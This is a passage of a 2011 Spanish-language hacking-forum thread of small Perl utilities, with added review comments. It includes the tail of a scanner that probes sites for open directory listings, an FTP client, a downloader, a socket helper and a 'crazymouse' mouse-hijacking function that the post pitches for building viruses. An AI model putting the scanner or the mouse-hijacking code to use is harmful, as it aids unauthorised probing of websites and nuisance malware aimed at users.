my $com = $junt->url();
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
if ($path=~/\/(.*)$/) {
my $path1 = $1;
# Removes what follows the first "/" of the path from the target URL.
# NOTE(review): $path1 is interpolated as a regex without quoting, and on
# later iterations $_[0] has already been shortened -- verify the intended
# behaviour before relying on it.
$_[0] =~s/$path1//ig;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($com);
# Keep everything up to the last "/" of the link's path and request it
# relative to the shortened target URL.
if ($path =~/(.*)\//) {
$code = toma($_[0].$1);
my $found = $1;
if ($code=~/Index Of (.*)<\/title>/ig) {
$ok = 1;
print "\n[Link] : ".$_[0].$found."\a";
savefile("indexs-found.txt",$_[0].$found);
}}}}
# Printed only when no listing was found during this run.
if ($ok ne 1) {
print "[Status] : Finish\n";
}}

# Appends every argument not seen before to the package array @revisado and
# returns that array. Both @revisado and the %repety counter are package
# variables, so what one call has seen carries over to the next.
sub repes {
    for my $item (@_) {
        push @revisado, $item unless $repety{$item}++;
    }
    return @revisado;
}


# Requests the URL in the first argument with the shared browser object and
# returns the body of the response.
sub toma {
    my $response = $new->get($_[0]);
    return $response->content;
}

# Returns every link of the page the shared browser object fetched last,
# in whatever context the caller asked for.
sub dame_link {
    return $new->find_all_links;
}

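# Appends one line to a log file under logs/.
#   $_[0]  file name inside the logs/ directory
#   $_[1]  text to append; a newline is added
# Returns the result of close on success, and an empty value (after a
# warning) when the file cannot be opened, e.g. because logs/ does not exist.
sub savefile {
    my ($name, $line) = @_;

    # Three-argument open with a lexical handle: the mode is fixed here and
    # cannot be influenced by characters in $name, and the handle does not
    # outlive this call.
    open(my $log, '>>', "logs/" . $name) or do {
        warn "savefile: cannot append to logs/$name: $!\n";
        return;
    };
    print {$log} $line . "\n";
    return close $log;
}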


# Prints the program's ASCII-art banner, surrounded by blank lines.
sub head {
    # No interpolation is needed, so the text is kept as a plain literal.
    my $banner = q(


##########  #########  #########     #####   #   ##### ### ###  ###
#  # #  ##  #  #   #   #  # #  #     #  #   #   # # #  #   #  #  #
#    #  ##  #  #    #  #    #  #     #  #  # #    #    #   #  #   
###  #  # # #  #    #  ###  ###      ###   # #    #    #####   ##
#    #  # # #  #    #  #    # #      #    #####   #    #   #     #
#    #  #  ##  #   #   #  # #  #     #    #   #   #    #   #  #  #
###  ######  # #####   ########  #   ###  ### ### ###  ### ### ###




);
    print $banner;
}


#The end
#Blog : doddy-hackman.blogspot.com
#Mail : lepuke[at]hotmail[com]

#356
Scripting / [Perl] FTP Manager
14 Octubre 2011, 15:25 PM
Hoy he terminado este simple cliente FTP; el código es el siguiente

Código (perl) [Seleccionar]
#!usr/bin/perl
#FTP Manager
#(C) Doddy Hackman 2010

use Net::FTP;

# Interactive FTP client: prints the banner, prompts for server, user and
# password, logs in, then reads one command per line and maps it onto
# Net::FTP calls until "exit" is typed.
# NOTE(review): the password is read with a plain <stdin>, so it is echoed on
# the terminal, and Net::FTP is constructed without any TLS option here, so
# the credentials presumably cross the network in cleartext -- confirm, and
# prefer an encrypted transport where the server offers one.
&head;

print "\n\n[FTP Server] : ";
chomp (my $ftp = <stdin>);
print "[User] : ";
chomp (my $user = <stdin>);
print "[Pass] : ";
chomp (my $pass = <stdin>);


if (my $socket = Net::FTP->new($ftp)) {
if ($socket->login($user,$pass)) {

print "\n[+] Enter of the server FTP\n\n";

# Loop head: the `goto menu` at the bottom jumps back here. The only way out
# is the exit command; end of input on stdin does not stop the loop.
menu:

print "\n\n>>";
chomp (my $cmd = <stdin>);
print "\n\n";

# The checks below are independent `if`s on unanchored patterns, so one
# input line can trigger more than one of them.
# NOTE(review): the help text spells mkdir as "mdkdir".
if ($cmd=~/help/) {
print q(

help : show information
cd : change directory <dir>
dir : list a directory
mdkdir : create a directory <dir>
rmdir : delete a directory <dir>
pwd : directory 
del : delete a file <file>
rename : change name of the a file <file1> <file2>
size : size of the a file <file>
put : upload a file <file>
get : download a file <file>
cdup : change dir <dir>


);
}

# NOTE(review): /dir/ also matches "mkdir ..." and "rmdir ...", so those
# commands print a listing as well.
if ($cmd=~/dir/ig) {
if (my @files = $socket->dir()) {
for(@files) {
print "[+] ".$_."\n";
}
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/pwd/ig) {
print "[+] Path : ".$socket->pwd()."\n";
}

if ($cmd=~/cd (.*)/ig) {
if ($socket->cwd($1)) {
print "[+] Directory changed\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/cdup/ig) {
if (my $dir = $socket->cdup()) {
print "\n\n[+] Directory changed\n\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/del (.*)/ig) {
if ($socket->delete($1)) {
print "[+] File deleted\n";
} else {
print "\n\n[-] Error\n\n";
}
}

# Both captures are greedy; the split between the two names falls on the
# last space of the line.
if ($cmd=~/rename (.*) (.*)/ig) {
if ($socket->rename($1,$2)) {
print "[+] File Updated\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/mkdir (.*)/ig) {
if ($socket->mkdir($1)) {
print "\n\n[+] Directory created\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/rmdir (.*)/ig) {
if ($socket->rmdir($1)) {
print "\n\n[+] Directory deleted\n";
} else {
print "\n\n[-] Error\n\n";
}
}

# Exit status is 1 on this normal way out.
if ($cmd=~/exit/ig) {
copyright();
exit(1);
}

# get and put only fire when two space-separated arguments are given,
# although the help text shows a single <file>.
if ($cmd=~/get (.*) (.*)/ig) {
print "\n\n[+] Downloading file\n\n";
if ($socket->get($1,$2)) {
print "[+] Download completed";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/put (.*) (.*)/ig) {
print "\n\n[+] Uploading file\n\n";
if ($socket->put($1,$2)) {
print "[+] Upload completed";
} else {
print "\n\n[-] Error\n\n";
}
}

goto menu;

} else {
print "\n\n[-] Failed the login\n\n";
}

} else {
print "\n\n[-] Error\n\n";
}

# Prints the program title.
sub head {
    my $title = "\n\n -- == FTP Manager == --\n\n";
    print $title;
}

# Prints the credit line shown when the client exits.
sub copyright {
    my $credit = "\n\n(C) Doddy Hackman 2010\n\n";
    print $credit;
}


# ¿ The End ?

#357
Scripting / [Perl] Funcion cambiar_fondo()
13 Octubre 2011, 17:15 PM
Hola a todos

Acabo de hacer una función usando las API de Windows para poder
cambiar el fondo de escritorio con solo poner la ruta de la
imagen

Código (perl) [Seleccionar]


#By Doddy H

use Win32::API;

# Sets the desktop wallpaper to the image whose path is the first argument
# and returns what the API call returns.
sub cambiar_fondo {

    # Bind user32!SystemParametersInfo: three integer-sized arguments and one
    # pointer in, an integer-sized value back.
    my $set_parameter = Win32::API->new(
        "user32", "SystemParametersInfo",
        [ 'L', 'L', 'P', 'L' ], 'L',
    );

    # Action code 20 is SPI_SETDESKWALLPAPER; the image path is the pointer
    # argument.
    $set_parameter->Call(20, 0, $_[0], 0);

}


Ejemplo de uso

Código (perl) [Seleccionar]

# The argument is the path of the image file to set as wallpaper.
cambiar_fondo("c:/Perl/img.bmp");
#358
Scripting / [Perl] Funcion download()
13 Octubre 2011, 17:14 PM
Hola, acá les traigo una función para descargar
archivos

Código (perl) [Seleccionar]

#!usr/bin/perl
#Simple downloader in Perl
#By Doddy H

use LWP::UserAgent;

# Shared HTTP client used by download(): fixed browser-like User-Agent string
# and a 5-second timeout.
my $nave = LWP::UserAgent->new(
    agent   => "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12",
    timeout => 5,
);

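# Downloads a URL into a local file with the shared client $nave.
#   $_[0]  URL to fetch
#   $_[1]  path of the file to write
# Returns 1 when the transfer succeeded (or the local copy was already
# current) and the file exists; returns nothing otherwise.
# NOTE(review): neither argument is validated here; if either can come from
# untrusted input, the caller should constrain the URL and the destination
# path before calling.
sub download {
    my ($url, $file) = @_;

    my $response = $nave->mirror($url, $file);

    # mirror() hands back a response object even when the request failed, so
    # its truthiness says nothing about the outcome; check the status.
    # 304 means the existing local copy is still up to date.
    return unless $response->is_success || $response->code == 304;

    return unless -f $file;
    return 1;
}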



Sintaxis

Código (perl) [Seleccionar]

download(url a bajar,nombre de archivo con el que se guarda);



Ejemplo de uso

Código (perl) [Seleccionar]

# Report success only when download() returns a true value.
print "[+] file downloaded\n"
    if download("http://127.0.0.1/bones.rar","bones.rar");

#359
Scripting / [Perl] Funcion crazymouse()
13 Octubre 2011, 17:13 PM
Hola a todos

Si yo de nuevo con esta nueva funcion crazymouse()
, con esta funcion podran volver loco al mouse sin poder controlarlo
todo por un tiempo elegido por ustedes , muy util si estan por
hacer un virus
Código (perl) [Seleccionar]


#By Doddy H
use Win32::GuiTest qw(MouseMoveAbsPix SendMessage);

# Moves the mouse pointer through the absolute pixel positions (1,1), (2,2)
# ... (N,N), where N is the first argument. There is no delay between the
# moves and no return value of interest.
sub crazymouse {
for my $number(1..$_[0]) {
# The same value is passed for both coordinates.
MouseMoveAbsPix($number,$number);
}
}


Ejemplo de uso

Código (perl) [Seleccionar]

# The string "666" becomes the upper bound of the 1..N range inside the sub.
crazymouse("666");

#360
Scripting / [Perl] Funcion conectar()
13 Octubre 2011, 17:12 PM
Hola a todos.

Aca les dejo una funcion para conectarse mediante sockets al servidor que quieran

Código (perl) [Seleccionar]
use IO::Socket;

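# Opens a TCP connection, sends one payload and returns the reply.
#   $_[0]  host name or address
#   $_[1]  port
#   $_[2]  text to send; "\r\n" is appended
# Returns up to 5000 bytes of the peer's answer followed by "\r\n", or
# nothing when the connection cannot be established.
sub conectar {
    my ($host, $port, $payload) = @_;

    # A failed connect used to surface only as a fatal error on the print
    # below; report it to the caller as "no result" instead.
    # NOTE(review): Timeout bounds the connect; the read further down can
    # still block on a peer that neither sends 5000 bytes nor closes --
    # confirm whether a read timeout is wanted.
    my $sockex = IO::Socket::INET->new(
        PeerAddr => $host,
        PeerPort => $port,
        Proto    => "tcp",
        Timeout  => 5,
    ) or return;

    print {$sockex} $payload . "\r\n";

    # Lexical buffer, so a call no longer overwrites the caller's $re.
    my $re = '';
    $sockex->read($re, 5000);
    $sockex->close;

    return $re . "\r\n";
}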


Sintaxis


conectar(host,puerto,parametro a enviar)


Ejemplo de uso

Código (perl) [Seleccionar]

# Sends one HTTP/1.0 request line to the web server on 127.0.0.1:80.
# conectar() appends a further "\r\n" to what it is given, which supplies the
# blank line that ends the request; the returned reply is then printed.
$re = conectar("127.0.0.1","80","GET /sql.php HTTP/1.0\r\n");
print $re;